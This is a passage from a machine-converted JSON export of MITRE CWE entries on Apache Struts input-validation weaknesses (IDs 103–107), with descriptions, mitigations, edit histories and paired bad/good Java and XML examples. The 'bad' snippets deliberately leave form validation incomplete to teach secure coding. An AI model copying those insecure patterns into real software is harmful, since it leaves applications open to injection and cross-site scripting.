implementation."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Other","Note":"Disabling the validation framework for a form exposes the application to numerous types of attacks. Unchecked input is the root cause of vulnerabilities like cross-site scripting, process control, and SQL injection."},{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":"Other","Note":"Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Implement the validate() method and call super.validate() within that method."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and the RegistrationForm bean in the Struts framework will maintain the user data. Tthe RegistrationForm class implements the validate method to validate the user input entered into the form.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","",""],"xhtml:div":[{"#text":"super();","attr":{"@_style":"margin-left:10px;"}},{"#text":"ActionErrors errors = new ActionErrors();if (getName() == null || getName().length() < 1) {}return errors;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"errors.add(\\"name\\", new ActionMessage(\\"error.name.required\\"));","attr":{"@_style":"margin-left:10px;"}}}]},{"#text":"// getter and setter methods for private variables...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}}","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {if (getName() == null || getName().length() < 1) {}return errors;","xhtml:br":["","","","","","","","","",""],"xhtml:div":[{"#text":"super();","attr":{"@_style":"margin-left:10px;"}},{"#text":"ActionErrors errors = super.validate(mapping, request);if (errors == null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"errors = new ActionErrors();","attr":{"@_style":"margin-left:10px;"}}},{"#text":"errors.add(\\"name\\", new ActionMessage(\\"error.name.required\\"));","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"// getter and setter methods for private variables...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}],"Body_Text":"Although the validate method is implemented in this example the method does not call the validate method of the ValidatorForm parent class with a call super.validate(). Without the call to the parent validator class only the custom validation will be performed and the default validation will not be performed. The following example shows that the validate method of the ValidatorForm class is called within the implementation of the validate method."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Erroneous validate() Method"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":[{"#text":"This could introduce other weaknesses related to missing input validation.","attr":{"@_Type":"Relationship"}},{"#text":"The current description implies a loose composite of two separate weaknesses, so this node might need to be split or converted into a low-level category.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Common_Consequences, Description, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Background_Details, Description"}]}},"104":{"attr":{"@_ID":"104","@_Name":"Struts: Form Bean Does Not Extend Validation Class","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"If a form bean does not extend an ActionForm subclass of the Validator framework, it can expose the application to other weaknesses related to insufficient input validation.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"In order to use the Struts Validator, a form must extend one of the following: ValidatorForm, ValidatorActionForm, DynaValidatorActionForm, and DynaValidatorForm. One of these classes must be extended because the Struts Validator ties in to the application by implementing the validate() method in these classes. Forms derived from the ActionForm and DynaActionForm classes cannot use the Struts Validator."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Other","Note":"Bypassing the validation framework for a form exposes the application to numerous types of attacks. Unchecked input is an important component of vulnerabilities like cross-site scripting, process control, and SQL injection."},{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":"Other","Note":"Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that all forms extend one of the Validation Classes."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user information from a registration webpage for an online business site. The user will enter registration data and through the Struts framework the RegistrationForm bean will maintain the user data.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.action.ActionForm {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}// getter and setter methods for private variables...","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// private variables for registration formprivate String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}// getter and setter methods for private variables...","xhtml:br":["","","","","","","","","",""],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}}}],"Body_Text":["However, the RegistrationForm class extends the Struts ActionForm class which does not allow the RegistrationForm class to use the Struts validator capabilities. When using the Struts framework to maintain user data in an ActionForm Bean, the class should always extend one of the validator classes, ValidatorForm, ValidatorActionForm, DynaValidatorForm or DynaValidatorActionForm. These validator classes provide default validation and the validate method for custom validation for the Bean object to use for validating input data. The following Java example shows the RegistrationForm class extending the ValidatorForm class and implementing the validate method for validating input data.","Note that the ValidatorForm class itself extends the ActionForm class within the Struts framework API."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Form Bean Does Not Extend Validation Class"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Background_Details, Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Background_Details"}]}},"105":{"attr":{"@_ID":"105","@_Name":"Struts: Form Field Without Validator","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application has a form field that is not validated by a corresponding validation form, which can introduce other weaknesses related to insufficient input validation.","Extended_Description":"Omitting validation for even a single input field may give attackers the leeway they need to compromise the application. Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"Some applications use the same ActionForm for more than one purpose. In situations like this, some fields may go unused under some action mappings."}},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Unexpected State"},{"Scope":"Integrity","Impact":"Bypass Protection Mechanism","Note":"If unused fields are not validated, shared business logic in an action may allow attackers to bypass the validation checks that are performed for other uses of the form."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Validate all form fields. If a field is unused, it is still important to constrain it so that it is empty or undefined."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example the Java class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data in the form fields using the private member variables. The RegistrationForm class uses the Struts validation capability by extending the ValidatorForm class and including the validation for the form fields within the validator XML file, validator.xml.","Example_Code":[{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:div":{"#text":"private String name;private String address;private String city;private String state;private String zipcode;private String phone;private String email;public RegistrationForm() {}...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","","","",""],"xhtml:i":["// private variables for registration form","// getter and setter methods for private variables"],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<form-validation></form-validation>","xhtml:div":{"#text":"<formset></formset>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<form name=\\"RegistrationForm\\"></form>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<field property=\\"name\\" depends=\\"required\\"></field><field property=\\"address\\" depends=\\"required\\"></field><field property=\\"city\\" depends=\\"required\\"></field><field property=\\"state\\" depends=\\"required,mask\\"></field><field property=\\"zipcode\\" depends=\\"required,mask\\"></field>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"<arg position=\\"0\\" key=\\"prompt.name\\"/>","attr":{"@_style":"margin-left:10px;"}},{"#text":"<arg position=\\"0\\" key=\\"prompt.address\\"/>","attr":{"@_style":"margin-left:10px;"}},{"#text":"<arg position=\\"0\\" key=\\"prompt.city\\"/>","attr":{"@_style":"margin-left:10px;"}},{"#text":"<arg position=\\"0\\" key=\\"prompt.state\\"/><var></var>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"<var-name>mask</var-name><var-value>[a-zA-Z]{2}</var-value>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"<arg position=\\"0\\" key=\\"prompt.zipcode\\"/><var></var>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"<var-name>mask</var-name><var-value>\\\\d{5}</var-value>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}],"xhtml:br":["","","",""]}}}}},{"attr":{"@_Nature":"good","@_Language":"XML"},"xhtml:div":{"#text":"<form-validation></form-validation>","xhtml:div":{"#text":"<formset></formset>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<form name=\\"RegistrationForm\\"></form>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<field property=\\"name\\" depends=\\"required\\"></field><field property=\\"address\\" depends=\\"required\\"></field><field property=\\"city\\" depends=\\"required\\"></field><field property=\\"state\\" depends=\\"required,mask\\"></field><field property=\\"zipcode\\" depends=\\"required,mask\\"></field><field property=\\"phone\\" depends=\\"required,mask\\"></field><field property=\\"email\\" depends=\\"required,email\\"></field>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"<arg position=\\"0\\" key=\\"prompt.name\\"/>","attr":{"@_style":"margin-left:10px;"}},{"#text":"<arg position=\\"0\\" key=\\"prompt.address\\"/>","attr":{"@_style":"margin-left:10px;"}},{"#text":"<arg position=\\"0\\" key=\\"prompt.city\\"/>","attr":{"@_style":"margin-left:10px;"}},{"#text":"<arg position=\\"0\\" key=\\"prompt.state\\"/><var></var>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"<var-name>mask</var-name><var-value>[a-zA-Z]{2}</var-value>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"<arg position=\\"0\\" key=\\"prompt.zipcode\\"/><var></var>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"<var-name>mask</var-name><var-value>\\\\d{5}</var-value>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"<arg position=\\"0\\" key=\\"prompt.phone\\"/><var></var>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"<var-name>mask</var-name><var-value>^([0-9]{3})(-)([0-9]{4}|[0-9]{4})$</var-value>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"<arg position=\\"0\\" key=\\"prompt.email\\"/>","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","","","","",""]}}}}}],"Body_Text":["The validator XML file, validator.xml, provides the validation for the form fields of the RegistrationForm.","However, in the previous example the validator XML file, validator.xml, does not provide validators for all of the form fields in the RegistrationForm. Validator forms are only provided for the first five of the seven form fields. The validator XML file should contain validator forms for all of the form fields for a Struts ActionForm bean. The following validator.xml file for the RegistrationForm class contains validator forms for all of the form fields."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Form Field Without Validator"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}]}},"106":{"attr":{"@_ID":"106","@_Name":"Struts: Plug-in Framework not in Use","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"When an application does not use an input validation framework such as the Struts Validator, there is a greater risk of introducing weaknesses related to insufficient input validation.","Extended_Description":{"xhtml:p":["Unchecked input is the leading cause of vulnerabilities in J2EE applications. Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others.","Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Use an input validation framework such as Struts."},{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use an input validation framework such as Struts."},{"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":"Use the Struts Validator to validate all program input before it is processed by the application. Ensure that there are no holes in the configuration of the Struts Validator. Example uses of the validator include checking to ensure that:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Phone number fields contain only valid characters in phone numbers","Boolean values are only \\"T\\" or \\"F\\"","Free-form strings are of a reasonable length and composition"]}}}},{"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":"Use the Struts Validator to validate all program input before it is processed by the application. Ensure that there are no holes in the configuration of the Struts Validator. Example uses of the validator include checking to ensure that:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Phone number fields contain only valid characters in phone numbers","Boolean values are only \\"T\\" or \\"F\\"","Free-form strings are of a reasonable length and composition"]}}}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.action.ActionForm {}","xhtml:div":{"#text":"private String name;private String email;...public RegistrationForm() {}...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","",""],"xhtml:i":["// private variables for registration form","// getter and setter methods for private variables"],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:div":{"#text":"private String name;private String email;...public RegistrationForm() {}public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...}...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// private variables for registration form","// getter and setter methods for private variables"],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"good","@_Language":"XML"},"xhtml:div":{"#text":"<struts-config></struts-config>","xhtml:div":{"#text":"<form-beans></form-beans>...<!-- ========================= Validator plugin ================================= --><plug-in className=\\"org.apache.struts.validator.ValidatorPlugIn\\"></plug-in>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"<form-bean name=\\"RegistrationForm\\" type=\\"RegistrationForm\\"/>","attr":{"@_style":"margin-left:10px;"}},{"#text":"<set-property","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"property=\\"pathnames\\"value=\\"/WEB-INF/validator-rules.xml,/WEB-INF/validation.xml\\"/>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}]},"xhtml:br":""}}],"Body_Text":["However, the RegistrationForm class extends the Struts ActionForm class which does use the Struts validator plug-in to provide validator capabilities. In the following example, the RegistrationForm Java class extends the ValidatorForm and Struts configuration XML file, struts-config.xml, instructs the application to use the Struts validator plug-in.","The plug-in tag of the Struts configuration XML file includes the name of the validator plug-in to be used and includes a set-property tag to instruct the application to use the file, validator-rules.xml, for default validation rules and the file, validation.XML, for custom validation."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Plug-in Framework Not In Use"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}]}},"107":{"attr":{"@_ID":"107","@_Name":"Struts: Unused Validation Form","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An unused validation form indicates that validation logic is not up-to-date.","Extended_Description":"It is easy for developers to forget to update validation logic when they remove or rename action form mappings. One indication that validation logic is not being properly maintained is the presence of an unused validation form.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Remove the unused Validation Form from the validation.xml file."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data in the form fields using the private member variables. The RegistrationForm class uses the Struts validation capability by extending the ValidatorForm class and including the validation for the form fields within the validator XML file, validator.xml.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RegistrationForm extends org.apache.struts.validator.ValidatorForm {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String name;private String address;private String city;private String state;private String zipcode;private String email;public RegistrationForm() {}...","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:i":["// private variables for registration form","// no longer using the phone form field","// private String phone;","// getter and setter methods for private 